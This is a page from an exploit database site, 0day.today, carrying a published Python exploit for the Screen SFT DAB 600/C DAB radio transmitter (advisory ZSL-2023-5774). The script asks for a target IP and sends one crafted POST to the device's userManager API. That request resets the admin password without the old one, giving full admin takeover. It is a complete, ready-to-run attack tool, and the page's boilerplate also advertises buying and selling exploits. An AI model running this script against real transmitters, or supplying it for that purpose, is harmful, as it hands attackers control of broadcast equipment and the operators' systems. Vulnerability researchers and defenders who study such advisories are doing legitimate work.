0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Exploit
#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: This exploit circumvents the control and requirement of admin's # old password and directly changes the password. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5774 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::changeUserPswd') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-+', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':'admin', 'password':h } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-2) # 0day.today [2024-06-27] #